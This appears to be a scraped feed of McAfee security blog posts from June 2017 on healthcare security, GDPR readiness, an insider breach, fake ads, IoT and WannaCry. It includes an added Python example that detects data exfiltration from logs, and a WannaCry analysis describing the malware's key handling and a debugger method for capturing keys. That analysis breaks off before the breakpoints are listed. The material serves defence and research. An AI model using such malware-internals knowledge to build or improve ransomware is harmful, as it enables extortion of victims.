If your child’s settings are set to My Friends and they still receive abusive Snaps from another user, get involved! Take a screenshot of the interactions then help your child block the user. You will then also need to report them to Snapchat’s Safety Team.


Well done! You are now ready to enter the world of Snapchat. Remember using the same technology and social media your kids do gives you real insight into their world while earning yourself a bit of tech cred! What are you waiting for? Join up today!

Take care

Alex xx

Public-private partnership critical to thwarting cyber threats https://securingtomorrow.mcafee.com/business/neutralize-threats/public-private-partnership-critical-to-thwarting-cyber-threats/ Mon, 12 Jun 2017 23:02:25 +0000 https://securingtomorrow.mcafee.com/?p=75014 While a set of more than 100 recommendations to help increase cybersecurity across the healthcare industry might seem like overkill, the co-chair of a task force that developed them believes the challenges are urgent and wide-ranging, requiring immediate and aggressive action. “There are so many areas that need to be addressed, quite frankly, given the …

The post Public-private partnership critical to thwarting cyber threats appeared first on McAfee Blogs.

While a set of more than 100 recommendations to help increase cybersecurity across the healthcare industry might seem like overkill, the co-chair of a task force that developed them believes the challenges are urgent and wide-ranging, requiring immediate and aggressive action.

“There are so many areas that need to be addressed, quite frankly, given the complexity of healthcare,” says Theresa Meadows, co-chair of the Health Care Industry Cybersecurity Task Force, which was created by Congress through the Cybersecurity Act of 2015 to examine the sector’s vulnerabilities.

Specifically, the task force’s June 2 report, which was sent to several congressional committees, calls for a unified effort by both the public and private sectors to counter the growing cyber threats that are putting patient information and safety at risk.

“Real cases of identity theft, ransomware and targeted nation-state hacking prove that our healthcare data is vulnerable,” states the report, which was finalized prior to last month’s WannaCry ransomware attack that compromised more than 300,000 computers worldwide in at least 150 countries, including the National Health Service in the United Kingdom.

“A breach is not a matter of if, but when,” warns Meadows. “Everybody is going to experience some level of this type of issue. One of the most important takeaways from the task force report is knowing your plan of action when a situation occurs so you can mitigate and recover from such an event.”

Meadows, who is also senior vice president and chief information officer at Cook Children’s Health Care System, contends that the panel’s intention was to provide actionable recommendations designed to increase security across the industry – each recommendation comes with one or more action items for implementing it.

The task force’s 100-plus recommendations are organized into six high-level imperatives, including increasing the security and resilience of medical devices and health IT. In particular, Meadows observes that medical devices are a “tough nut to crack because most institutions have medical devices for many years,” adding that, on average, it’s a 10- to 15-year investment timeframe.

“Our security posture has really changed over those 15 years, and those devices were not designed to have all of those mitigation factors in place, nor were they designed to be fully integrated to electronic health records,” she notes. “Some of the mandates around Meaningful Use have really driven up the risk around medical devices because they weren’t initially designed that way. The key is beginning to replace those legacy devices so we can have them on the most current software and security without it being cost-prohibitive.”

According to Meadows, another high-level healthcare cybersecurity imperative is improving information sharing of industry threats, weaknesses and mitigations. “Some organizations wouldn’t want to report a security incident because of how it might affect them from a consumer standpoint, but there are a lot of good mechanisms to share critical information to fix and prevent issues without identifying the institutions that reported it,” she says.

Meadows believes that one of the strongest recommendations made by the task force is for the Department of Health and Human Services to create a cybersecurity leader role within HHS to align industry-facing efforts for healthcare cybersecurity. She makes the case that many different programs and agencies within and outside of HHS are responsible for cybersecurity, but it’s critical to have a single person who is responsible for coordinating these activities.

Overall, the successful implementation of these recommendations “will require adequate resources and coordination across the public and private sector,” finds the task force’s report.

However, the task force points out that healthcare organizations “often lack the infrastructure to identify and track threats, the capacity to analyze and translate the threat data they receive into actionable information, and the capability to act on that information.”

It’s a serious problem for healthcare organizations, which have a responsibility to secure their systems, medical devices and patient data from these kinds of cyber attacks with razor-thin operating margins, and, as a result, “cannot afford to retain in-house information security personnel, or designate an information technology staff member with cybersecurity as a collateral duty,” according to the task force.

Meadows acknowledges that security is a “harder sell” for C-level healthcare executives “because it’s really an insurance policy and there’s no perceived ROI to having good security posture and hygiene,” particularly in smaller organizations facing resource constraints.

However, organizations making the decision to “prioritize cybersecurity within the healthcare industry requires culture shifts and increased communication to and from leadership, as well as changes in the way providers perform their duties in the clinical environment,” concludes the task force report.

“People are beginning to see that it’s more of a priority,” adds Meadows. “It’s going to take all of us working together to really make some headway on these issues on how to improve security in healthcare. I hope organizations will really take to heart some of the recommendations that have been made and begin to put implementation plans in place.”

 

This article was written by Greg Slabodkin from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Public-private partnership critical to thwarting cyber threats appeared first on McAfee Blogs.

Preparing for the General Data Protection Regulation in 2017, Part 4: Your Security Operations Centre (SOC) https://securingtomorrow.mcafee.com/languages/german/vorbereitung-auf-die-datenschutz-grundverordnung-2017-teil-4-ihr-sicherheitskontrollzentrum-soc/ https://securingtomorrow.mcafee.com/languages/german/vorbereitung-auf-die-datenschutz-grundverordnung-2017-teil-4-ihr-sicherheitskontrollzentrum-soc/#respond Mon, 12 Jun 2017 22:27:27 +0000 https://securingtomorrow.mcafee.com/?p=75182 This is the fourth in a series of blog posts designed to help enterprise security and business executives prepare for the General Data Protection Regulation (GDPR) in 2017. One of the key requirements under the new General Data Protection Regulation is breach reporting. Reporting a breach of course presupposes the ability to detect a data breach, and that is …

The post Preparing for the General Data Protection Regulation in 2017, Part 4: Your Security Operations Centre (SOC) appeared first on McAfee Blogs.

This is the fourth in a series of blog posts designed to help enterprise security and business executives prepare for the General Data Protection Regulation (GDPR) in 2017.

One of the key requirements under the new General Data Protection Regulation is breach reporting. Reporting a breach of course presupposes the ability to detect a data breach, and that is not always easy.

Research by McAfee Labs has shown that more than 53 percent of all incidents are detected externally. In addition, a 2016 SANS incident response survey found that only about 16 percent of security operations centres (SOCs) were considered mature.

From my own experience I can confirm that many security operations focus on hunting for malware threats and have very few use cases for insider threats or data exfiltration. This leads to a further alarming statistic. A 2016 Ponemon Institute report found that only 24 percent of businesses are able to detect unauthorised access to critical systems in less than 24 hours.

All of this leads me to believe that most security operations are not ready for GDPR.

In this post I have listed some key steps security operations can take to be better prepared for GDPR.

Understanding the Journey

The first step towards improvement is understanding your current state and creating a plan for moving forward. I developed this simple three-step model to help organisations assess their current security operations, particularly with regard to detecting data breaches and responding to them.

Preparing for GDPR in 2017, Part 4: Your SOC https://securingtomorrow.mcafee.com/business/safeguard-data/preparing-gdpr-2017-part-4-soc/ https://securingtomorrow.mcafee.com/business/safeguard-data/preparing-gdpr-2017-part-4-soc/#respond Mon, 12 Jun 2017 16:00:40 +0000 https://securingtomorrow.mcafee.com/?p=74612 This is the fourth in a series of blog posts designed to help enterprise security and business executives prepare for GDPR throughout 2017. (Part 1, 2, 3) One of the key requirements under the new General Data Protection Regulation is breach reporting. Of course, to report a breach implies you have the capability to detect …

The post Preparing for GDPR in 2017, Part 4: Your SOC appeared first on McAfee Blogs.

This is the fourth in a series of blog posts designed to help enterprise security and business executives prepare for GDPR throughout 2017. (Part 1, 2, 3)

One of the key requirements under the new General Data Protection Regulation is breach reporting. Of course, to report a breach implies you have the capability to detect a data breach – and that’s not always easy.

McAfee Labs research discovered that over 53 per cent of all incidents are detected externally. Additionally, a SANS Incident Response survey from 2016 found that only about 16 per cent of security operations centres (SOCs) were considered in a mature state.

From my own experience, many security operations are mostly focused on malware threat hunting with very few use cases for insider threat or data exfiltration. That leads to one more alarming statistic. A 2016 Ponemon report found that only 24 per cent of businesses can identify unauthorised access to critical systems in less than 24 hours.

All of this leads me to believe that most security operations are not ready for GDPR.

In this post, I have outlined a few key steps security operations can take to improve readiness for GDPR.

Understand the Journey:

The first step to improvement is understanding your current state and designing a plan to move forward. I put together this simple three-step model to help organisations assess their current security operations capability as it relates specifically to data breach detection and response.

In my experience, most customers are somewhere between level one and two but an increasing number are exploring adoption of advanced technologies, like user behaviour analytics, to help detect advanced attacks whether from the inside or outside. More on analytics later.

Getting the Right Data for the Job:

Without the right visibility into user and data activity, detecting data breaches, or even investigating suspicious activity, becomes near impossible. Most security operations are familiar with the data sources used to hunt malware incidents. Intelligence such as malware indicators of compromise, firewall traffic logs and endpoint AV logs are commonly collected to help investigate or detect compromised machines.

However, identifying unauthorised user behaviour or detecting data exfiltration requires a different level of visibility. Consider adding the following data sources to your SIEM and other data aggregation platforms:

Data loss prevention (DLP)

Endpoint and network DLP sensors provide potential insights into accidental data loss or simple data theft attempts. They are essential logs to investigate a reported breach and to proactively identify an incident.

Identity and access management

Data from access and privilege management systems are necessary to identify or investigate unauthorised access attempts to critical systems.

Database Activity Monitors

Databases are often overlooked as a key data source for detection and response. Yet they often hold the key to detecting a data breach early. Collecting database logs is good but you should augment with specialised sensors that provide other points of visibility.

Analytics for Insights:

What are the right ‘operational insights’ I need in order to identify and validate a data breach? Deriving operational insights from the collected data is the key goal of security operations and often the hardest. Many organisations look for a singular platform to analyse data but the smarter approach is to deploy the right tool for the job.

These are some of the key technology building blocks and their primary role in data breach analysis.

Security information and event management (SIEM)

SIEM platforms aggregate data and provide the diagnostics necessary to rapidly investigate and validate security incidents. Security operations should look for features that simplify data breach investigations, such as pivot functions on user behaviour or those that support the Unified Compliance Framework, to ease reporting efforts.

User behaviour and entity analytics (UEBA)

UEBA platforms, on the other hand, gather data from SIEM or raw event sources and use advanced machine learning techniques to provide indicators of potential insider threat. Security operations should look for solutions with many different behaviour models, particularly models tuned to the insider threat kill chain.

Network Behaviour Analytics

Network behaviour analysis platforms perform a similar function to UEBA but are focused on network traffic flows. The advanced analytics should be tuned to detect data exfiltration attempts.
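As an added example of the correlation the two sections above describe (this is not code from the post or from McAfee), the Python below joins constructed DLP, identity-management and database-activity log lines on the user field and flags a user whose privilege escalation on a critical host, or bulk read of a critical database, is followed within an hour by a DLP policy violation. It also computes the detection lag against the 24-hour figure quoted earlier. The log format, field names, host list and thresholds are all assumptions; real products emit their own schemas.

```python
"""Correlate DLP, IAM and database-activity events to surface a candidate data breach.

Added example for this post (not McAfee code). The log lines below are constructed
and the field names, host names and thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines: ISO timestamp followed by key=value pairs.
SAMPLE_LOGS = """\
2017-06-01T08:02:11Z src=iam event=login user=jdoe host=hr-db-01 result=success
2017-06-01T08:05:40Z src=iam event=privilege_escalation user=jdoe host=hr-db-01 role=db_admin
2017-06-01T08:07:02Z src=dbam event=query user=jdoe db=hr table=employees rows=25000
2017-06-01T08:09:15Z src=dlp event=policy_violation user=jdoe channel=usb policy=PII bytes=9200000
2017-06-01T09:00:00Z src=dbam event=query user=asmith db=hr table=employees rows=40
2017-06-01T09:30:00Z src=iam event=login user=asmith host=hr-db-01 result=success
2017-06-01T11:12:33Z src=iam event=login user=mlee host=hr-db-01 result=failure
2017-06-01T15:45:00Z src=dlp event=policy_violation user=asmith channel=email policy=PII bytes=120000
"""

LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z)\s+(?P<body>.+)$")

CRITICAL_HOSTS = {"hr-db-01"}   # assumed: systems holding personal data
ROW_THRESHOLD = 10_000          # assumed: more rows than any routine job reads
WINDOW = timedelta(hours=1)     # sensitive access followed by a DLP hit within this window


def parse_line(line):
    """Parse one log line into a dict of fields plus a 'ts' datetime."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError("unparseable log line: %r" % line)
    fields = dict(kv.split("=", 1) for kv in m.group("body").split())
    fields["ts"] = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
    return fields


def parse_logs(text):
    """Parse a block of log text into a list of event dicts, skipping blank lines."""
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def is_sensitive_access(e):
    """IAM privilege escalation on a critical host, or a bulk database read."""
    if e["src"] == "iam" and e["event"] == "privilege_escalation":
        return e.get("host") in CRITICAL_HOSTS
    if e["src"] == "dbam" and e["event"] == "query":
        return int(e.get("rows", "0")) >= ROW_THRESHOLD
    return False


def correlate(events):
    """Return {user: finding} for users whose sensitive access is followed by a DLP violation.

    A finding records the earliest sensitive access, the DLP event time and the
    list of access indicators (src:event) that fell inside the window.
    """
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)
    findings = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        access = [e for e in evs if is_sensitive_access(e)]
        dlp = [e for e in evs if e["src"] == "dlp" and e["event"] == "policy_violation"]
        for a in access:
            for d in dlp:
                gap = d["ts"] - a["ts"]
                if timedelta(0) <= gap <= WINDOW:
                    f = findings.setdefault(
                        user, {"first_access": a["ts"], "dlp": d["ts"], "indicators": []})
                    f["first_access"] = min(f["first_access"], a["ts"])
                    f["indicators"].append("%s:%s" % (a["src"], a["event"]))
    return findings


def detection_lag_hours(finding, detected_at_iso):
    """Hours from the first sensitive access to the moment the SOC raised the alert."""
    detected_at = datetime.strptime(detected_at_iso, "%Y-%m-%dT%H:%M:%SZ")
    return (detected_at - finding["first_access"]).total_seconds() / 3600.0


if __name__ == "__main__":
    found = correlate(parse_logs(SAMPLE_LOGS))
    for user, f in found.items():
        lag = detection_lag_hours(f, "2017-06-01T09:00:00Z")
        print(user, f["indicators"], "detection lag %.2f h" % lag)
```

On the constructed input only jdoe is flagged: asmith's DLP event has no preceding privilege change or bulk read, and mlee's failed login is an IAM signal with nothing to join it to. The point of the example is that none of the three sources on its own produces the finding; the join across identity, database and DLP data does.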

These are just a few of the key steps security ops must take to improve their readiness for GDPR.

Please follow my blog on Securing Tomorrow for continuous insights on GDPR and other cyber security issues.

Preparing for GDPR in 2017 – Part 4: Your SOC https://securingtomorrow.mcafee.com/languages/francais/se-preparer-au-rgpd-en-2017-quatrieme-partie-votre-soc/ https://securingtomorrow.mcafee.com/languages/francais/se-preparer-au-rgpd-en-2017-quatrieme-partie-votre-soc/#respond Mon, 12 Jun 2017 15:40:42 +0000 https://securingtomorrow.mcafee.com/?p=75046 This blog post is the fourth in a series intended to help business leaders and security executives prepare for the GDPR throughout 2017. One of the fundamental requirements of the new General Data Protection Regulation (GDPR) is the notification of …

The post Preparing for GDPR in 2017 – Part 4: Your SOC appeared first on McAfee Blogs.

This blog post is the fourth in a series intended to help business leaders and security executives prepare for the GDPR throughout 2017.

One of the fundamental requirements of the new General Data Protection Regulation (GDPR) is the notification of data breaches. Of course, to be able to report a data breach you must first be able to detect it, which is not always an easy task.

A McAfee Labs study found that more than 53% of incidents are detected by a third party. In addition, according to a 2016 incident response survey by the SANS Institute, only about 16% of security operations centres (SOCs) were considered mature.

From my own experience, many of these centres focus mainly on hunting malware and pay very little attention to insider threats or data exfiltration. This brings us to even more alarming statistics. According to a 2016 Ponemon Institute study, only 24% of businesses are able to identify unauthorised access to their critical systems in less than 24 hours.

All of this leads me to believe that most security operations centres are not ready for GDPR compliance.

So here are a few measures I encourage them to take to improve their state of readiness.

Understanding the Transition

The first step is to analyse your organisation's current situation and draw up a plan for moving forward. To help you assess your security operations' capabilities for detecting data breaches and responding to those incidents, I propose a simple three-step model, illustrated below.

In my experience, most customers are between levels 1 and 2. However, more and more of them are considering adopting advanced technologies, such as user behaviour analytics, to better detect advanced attacks, whether carried out from inside or outside the organisation. I will return to analytics later.

Getting the Right Data for the Job

Without full visibility into user activity and data, detecting data breaches, or even investigating suspicious activity, is practically impossible. Most security operations centres are familiar with the data sources used to investigate incidents involving malware. Threat intelligence is frequently collected to detect compromised machines and conduct investigations. This includes malware indicators of compromise, firewall traffic logs and logs from endpoint antivirus.

Identifying unauthorised user behaviour and detecting data exfiltration, however, require a completely different level of visibility. Consider adding the following data sources to your SIEM solution and other data aggregation platforms:

Data loss prevention (DLP): Endpoint and network DLP sensors provide potentially significant information about accidental data leaks or simple data theft attempts. This information is kept in logs that are essential for investigating a reported breach and proactively identifying an incident.

Identity and access management: Data from access and privilege management systems is needed to identify or investigate unauthorised access attempts to critical systems.

Database activity monitoring: Databases are often overlooked as a key data source for incident detection and response. Yet they hold the information that makes it possible to spot a data breach very early. Collecting database logs is therefore useful, but they must be supplemented by data from specialised sensors to obtain other points of visibility.

Analytics for Relevant Insights

What precise operational insights do I need to identify a data breach and confirm that it actually occurred? Drawing operationally relevant conclusions from the collected data is the main goal of security operations centres and, very often, the hardest to achieve. Many organisations want a single platform to analyse data, but it is wiser to deploy the tool designed specifically for the task.

Some of the fundamental technologies and the primary role each plays in data breach analysis are described below.

Security information and event management (SIEM): SIEM platforms aggregate data and provide the diagnostics needed to rapidly analyse and validate security incidents. For security operations centres, features that simplify data breach investigations are essential to ease reporting. These include cross-analysis (pivoting) of user behaviour and features that support the Unified Compliance Framework (UCF).

User and entity behaviour analytics (UEBA): UEBA platforms, for their part, gather data from SIEM solutions or raw event sources. They use advanced machine learning techniques to provide indicators of potential insider threats. Security operations centres should favour a solution that includes a variety of behavioural models, which must be tuned to the insider threat kill chain.

Network behaviour analytics: Network behaviour analysis platforms perform a function similar to UEBA platforms but focus on network traffic flows. The advanced analytics should be optimised to detect data exfiltration attempts.

These are just a few of the main measures SOC managers must take to improve their readiness for GDPR.

Follow my Securing Tomorrow blog to stay up to date on GDPR and the major cybersecurity issues.

Employee at Trios Health snoops on data of 600 patients https://securingtomorrow.mcafee.com/business/safeguard-data/employee-at-trios-health-snoops-on-data-of-600-patients/ Fri, 09 Jun 2017 21:09:28 +0000 https://securingtomorrow.mcafee.com/?p=74980 An employee at Trios Health, which is anchored by Trios Southridge Hospital in Washington State, was using its electronic health record system not just to perform job duties but to also look up information on patients outside of the employee’s job function. The incident is the latest in a spate of breaches at healthcare organizations …

The post Employee at Trios Health snoops on data of 600 patients appeared first on McAfee Blogs.

An employee at Trios Health, which is anchored by Trios Southridge Hospital in Washington State, was using its electronic health record system not just to perform job duties but to also look up information on patients outside of the employee’s job function.

The incident is the latest in a spate of breaches at healthcare organizations by insiders; it is the fifth such incident that Health Data Management tracked in May.

The Trios Health breach was discovered by its health information management department on March 14. Compromised data included dates of service, diagnoses, demographic information, Social Security numbers, driver’s license numbers, phone numbers and email addresses.

After an investigation, the organization put in new EHR use restrictions to staff within the employee’s department and terminated the employee. The investigation continues, as does additional privacy training and new standard auditing processes to protect PHI. Notification letters to about 600 affected patients started being mailed on May 29.

Trios Health is offering a year of identity theft, credit and fraud monitoring protection services for affected patients through Identity Force. Spokespersons for the organization did not respond to a request for additional information.

Other breaches at healthcare organizations of protected health information caused by insiders include the following:

  • At Med Center Health in Kentucky, an employee took data on two occasions to build an outside business.
  • Beacon Health System in Indiana discovered an employee had been accessing patient emergency department records for three years without permission or a reason to view them.
  • A volunteer at NYC Health + Hospitals inadvertently caused a breach because she handled protected health information before being fully vetted and trained by the human resources department.
  • Two employees in the patient transport department at Vanderbilt University Medical Center were inappropriately accessing patient records by obtaining more information than needed to do their jobs.

 

This article was written by Joseph Goedert from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

How to Avoid Falling for a Fake Ad Scam https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/avoid-falling-fake-ad-scam/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/avoid-falling-fake-ad-scam/#respond Fri, 09 Jun 2017 18:58:02 +0000 https://securingtomorrow.mcafee.com/?p=74971 They say impersonation is the sincerest form of flattery, but when it comes to the internet, copy cats don’t always have the best intentions. The act of duping someone on the web is simple, and unfortunately, common as of late. Recently, we’ve seen ads show up across social media sites and, websites claiming to be …

The post How to Avoid Falling for a Fake Ad Scam appeared first on McAfee Blogs.

They say impersonation is the sincerest form of flattery, but when it comes to the internet, copycats don’t always have the best intentions. The act of duping someone on the web is simple and, unfortunately, common as of late. Recently, we’ve seen ads show up across social media sites and websites claiming to be from well-established companies, when in reality they’re quite the opposite. What’s more, these bogus ads aren’t only fooling users with misleading information; they could be impacting their personal security as well.

This past week, McAfee saw this kind of scam impact our customers firsthand, as a few people mentioned on Twitter they were duped by ads pretending to be our antivirus product. As to be expected, most were concerned because these fake ads could potentially have a malicious intent.

And unfortunately, sometimes they do. One user told us they had unwittingly purchased a Groupon for McAfee, only to find out she was being scammed and possibly infected with malware to boot (which has since been reported to Groupon).

We’re just one of the many brands out there being negatively impacted by these bogus ads, which can ultimately harm both consumers and businesses. So, now the question is, what can people do to ensure they avoid fake ads, and not risk their personal security? We have a few tips on how to combat this scam:

- Go straight to the source. Advertisements are a great way to get the word out about a product, but if you see an ad and know you’re interested in a solution, navigate directly to the company’s website to look into their offerings. That way, you can know you’re buying from a trusted source.

- See what the company has to say. At McAfee, both our technical support team and social team have helped clarify with consumers whether a deal or ad is one of our own. So, if you’re ever unsure of an offering, reach out directly to a company and ask about it before you pursue it.

- Stay secure while you browse. Sometimes it’s hard to identify whether a website is full of fake ads, or whether it can be trusted or not. So, add an extra layer of security to your browser, and surf the web safely by utilizing McAfee SiteAdvisor.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

4 Tips to Secure Your IoT Deployment https://securingtomorrow.mcafee.com/business/optimize-operations/4-tips-to-secure-your-iot-deployment/ Thu, 08 Jun 2017 22:17:12 +0000 https://securingtomorrow.mcafee.com/?p=74952 After years of delays and false starts, 2017 is supposed to be the year where the Internet of Things (IoT) truly starts to become a ubiquitous part of our lives. But while progress has been made, deploying IoT devices has been slowed by various concerns, of which the biggest are the very real security concerns …

The post 4 Tips to Secure Your IoT Deployment appeared first on McAfee Blogs.

After years of delays and false starts, 2017 is supposed to be the year where the Internet of Things (IoT) truly starts to become a ubiquitous part of our lives. But while progress has been made, deploying IoT devices has been slowed by various concerns, of which the biggest are the very real security concerns around any IoT network.

Any IoT breach can carry serious consequences. A survey released today found that “Almost half of all companies in the US using an IoT network have been the victims of recent security breaches,” which can cost smaller companies around 13 percent of their annual revenue. Each of the tens of billions of devices that make up IoT networks is a security threat, and the network is only as strong as its least protected device.

None of this takes away from the IoT’s benefits. But if companies want to use the IoT without worrying about threats like ransomware or privacy breaches, there are some critical steps to take to ensure the security of your network and organization.

1. Prioritize your devices

A February IoT forecast estimates that there will be 8.4 billion connected things worldwide in 2017 and that this number will increase to 20 billion by 2020. But just because a device can be connected to the Internet does not mean it should be. And each one of those devices represents a security threat, as shown by cyberattacks in which hackers took down major websites like the New York Times by hacking baby monitors and webcams.

I did not make that last sentence up. Each one of these devices represents a risk. And newer, more innovative IoT devices are more problematic because toaster and refrigerator manufacturers do not possess the technological knowledge needed to protect their devices that larger tech companies have.

If you are creating a network with an IoT signal booster, whether for your home or your business, each and every device added is a potential security risk. Consequently, take the time to ask yourself if you really need that new device which boasts Internet connectivity to be connected to the Internet. If you cannot think of a good reason, then do not connect it. As so many more companies create new devices as part of the IoT, users have to realize that some devices are not worth the risk.

2. Hold cyber security drills

You have probably heard stories about how some businesses pay hackers to try and break into their business so they know what their weaknesses are. Such an approach may be a bit extreme, but a business should consider holding cyber security drills in order to identify weak IoT devices and how secure your system is.

Drills are not just about knowing your cyber security weaknesses. They are about ensuring that everyone knows what to do in the event of a breach. Businesses should have a plan for a data breach or hacking just as a business in Japan should have a plan for what to do in the case of an earthquake. If a hacker breaks into your business through your IoT devices and uncovers data, testing beforehand should make it clear what sort of response your business should give and what sort of data is the most likely to be at risk.

3. Communication within the business

As noted above, a major threat with IoT security is that there are a lot of IoT-related devices out there where security is a secondary concern for the device makers and tacked on at the end. This cannot happen if you are deploying an IoT network yourself. Leadership must be in constant communication with their IT departments so that everyone is on the same page.

This may seem obvious, but IT departments everywhere have long complained that leadership does not understand the security risks it is taking on, and IoT will only make this worse. I have personally heard, in certain companies, the idiotic paradigm of leaders who say the IT department is pointless when things are going fine, and then complain that it is not doing its job when things go badly.

The IoT necessitates further cooperation between IT and the highest levels of leadership to know what security measures should be implemented for your business. Get on it.

4. Change passwords

A basic example of the lack of communication between leadership and IT concerns passwords. Most IT professionals know that it is important to have strong passwords which are changed regularly, but leadership can chafe at trying to remember those more complicated passwords. But a strong password really matters for IoT devices. Many of them come with a default password, but businesses never bother to change them as they are unaware of the security risks.

Passwords and encryption remain some of the most basic yet critical aspects of protecting your devices. Talk with IT about ensuring that all of your devices carry strong protection and that it is changed regularly.

 

This article was written by Gary Eastwood from CIO and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

Is WannaCry Really Ransomware? https://securingtomorrow.mcafee.com/executive-perspectives/wannacry-really-ransomware/ https://securingtomorrow.mcafee.com/executive-perspectives/wannacry-really-ransomware/#respond Thu, 08 Jun 2017 16:26:14 +0000 https://securingtomorrow.mcafee.com/?p=74857 Ransomware follows a relatively simple model: data is encrypted, the victim pays, data is decrypted. At least that is what those who create ransomware want you to believe. This was also our assumption when we began our analysis of WannaCry—that those behind the campaign would decrypt victims’ data once they received payment. However, for a campaign with incredibly effective propagation techniques, reasonable key and data management, and a working anonymous communication fabric with Bitcoin payments, we found a major flaw: The WannaCry attackers appear to be unable to determine which users have paid the ransom and they cannot decrypt on a per-user basis.

The post Is WannaCry Really Ransomware? appeared first on McAfee Blogs.

This post summarizes the significant efforts of a McAfee threat research team that has been relentless in its efforts to gain a deeper understanding of the WannaCry ransomware. We would like to specifically acknowledge Christiaan Beek, Lynda Grindstaff, Steve Grobman, Charles McFarland, and Kunal Mehta for their efforts.

Ransomware follows a relatively simple model: data is encrypted, the victim pays, data is decrypted. At least that is what those who create ransomware want you to believe. This was also our assumption when we began our analysis of WannaCry—that those behind the campaign would decrypt victims’ data once they received payment. However, for a campaign with incredibly effective propagation techniques, reasonable key and data management, and a working anonymous communication fabric with Bitcoin payments, we found a major flaw: The WannaCry attackers appear to be unable to determine which users have paid the ransom and they cannot decrypt on a per-user basis.

Technical summary

Our analysis into the encryption and decryption functions within WannaCry reveals an effective tool set. The authors:

  • Created an 8-byte unique identifier (via CryptGenRandom) that identifies the current machine and all the encrypted files on that machine. This ID is used in all communications with the back end and is intended to allow per-user decryption. (See “Can the attackers be contacted?” for details.)
  • Practiced reasonable data sanitization techniques to prevent the recovery of key material. (See “Does WannaCry prevent recovery of key material?”)
  • Followed reasonable practices to prevent the recovery of plain-text file data. (See “Does WannaCry prevent recovery of file data?”)
  • Developed a (somewhat unreliable) back end that keeps track of which users have encrypted files. (See “Can the authors respond? Can they return a private key?”)
  • Made file decryption possible, provided that the “Check Payment” interaction with the back end results in the decrypted key being written to 00000000.dky. The authors know if the returned data is a key or a message to be displayed to the user. The authors must have tested this at least once, and have thus tested full decryption where the need for the correct private key was clearly known. (See “Recovering the user’s private key”)
  • WannaCry appears to have been written by (at least) two authors or teams with different motives:
    • One author favored Win32 APIs and wrapping those APIs or using object orientation.
    • The other author favored C, common APIs (such as fopen), and long procedural functions. They may have been responsible for weaponizing the file encryptor/decryptor, but we do not know. If we are correct, this code probably introduced the unique ID idea but the interface was not updated to include a way to associate the ID with the user’s Bitcoin wallet.

The WannaCry authors demonstrated good technical governance, for example, the key handling, buffer sanitization, and private key security on disk using a strongly encrypted format. It is odd that with such good governance, the same group neglected to include a way to tie a payment to the per-machine unique ID, because that link is mandatory to decrypt a specific user’s files. While much of the initial analysis described the WannaCry campaign as “shoddy,” the use of good technical governance suggests that there are elements of this campaign that are well implemented.

This competence raises doubts that the campaign was shoddy. Given the level of capability demonstrated, we would expect the developers to have found and fixed basic errors. Indeed, could the inclusion of these basic errors be an attempt to make the campaign appear amateur? Without apprehending those behind the campaign, it is impossible to know their motivation; yet a thorough analysis of the technical artefacts calls the shoddy theory into question.

Motivations

What were the attackers’ motives? Is this real ransomware or something else? For a particular ransomware family to make money in the long term, it must be able to encrypt and decrypt files, and have a reputation that once payment is sent, data can be recovered.

We have identified three potential motives:

  • To make money
    • WannaCry has the key components required for a financially successful campaign—including propagation, key management, data sanitization techniques to prevent data and key recovery, anonymous payment, and messaging and decryption infrastructure.
    • To keep ransom payments flowing, the authors used current messaging infrastructure to ask users to send their Bitcoin wallet IDs to the attackers. This is the same messaging infrastructure that ultimately delivers the user’s private key, allowing full decryption.
    • However, there is limited evidence from the field that payment yields data decryption.
  • To test key components of the ransomware
    • This is likely because the malware contains almost no reverse engineering and debugging protection.
    • We have already seen new WannaCry variants that are harder to analyze because components download 24 hours or so after infection time.
  • To disrupt
    • Ransomware as a destructive mechanism. The use of ransomware to destroy or generate noise, though not common, would be a particularly effective tactic.

Determining the authors’ intent is not trivial, and likely not possible with the information available. However, to get closer to an answer, the question we need to answer is whether WannaCry is fully functional. Analyzing that leads to a few detailed questions that we explored:

  • Can WannaCry decrypt files?
  • Can the authors be contacted?
  • Can the authors respond? Can they return a private key?
  • Does WannaCry prevent the recovery of files?
  • Does WannaCry prevent the recovery of key material?

Is WannaCry fully functional?

WannaCry can communicate with a back end that maintains its state, and it prevents the recovery of key material and file data. If one has the user’s private key, the user’s data can be recovered. Despite its bugs and design issues, WannaCry is effective. It is not high quality or well implemented, but it is effective.

Can WannaCry decrypt files?

The short answer is Yes. WannaCry’s encryption, key management, and file formats have been documented by McAfee Labs, so we will not cover that here. Instead, we will focus on the decryption tool, which we know makes use of the following API sets:

  • Microsoft’s crypto APIs.
    • CryptGenKey, CryptGenRandom, CryptExportKey, CryptImportKey, CryptEncrypt, CryptDecrypt, etc.
  • Microsoft’s file management APIs.
    • CreateFileW, ReadFile, WriteFile, CloseHandle, etc.
  • C runtime library file APIs
    • fopen, fread, fwrite, fflush, fclose, etc.

Using WinDbg or IDA Pro, we can set conditional breakpoints on the APIs used by @WanaDecryptor@.exe and dump out useful information. Given the lack of debugging protection in the ransomware, this is one of the fastest ways to understand WannaCry’s behavior.

Sample decryption

To encourage users to pay the ransom, the decryption tool @WanaDecryptor@.exe can decrypt a small number of files for free. After the “free” files have been decrypted, the decryptor looks for the file 00000000.dky, which should contain the user’s private key. If found, this key is used to decrypt all files on the system. If we have the user’s private key, can we decrypt all files?

Recovering the user’s private key

To prove that decryption is possible, we need the private key:

  • Break on CryptGenKey and get the handle to any created key pair.
  • Break on CryptExportKey and watch the export of the public and private keys to memory.
    • Here we can steal the private key and check if decryption works.
  • [Optionally] set breakpoints showing the encryption of the private key with the attacker’s public key (hardcoded within the encryptor binary) and its write to disk as 00000000.eky.

To analyze the key creation, we can use the following breakpoints:

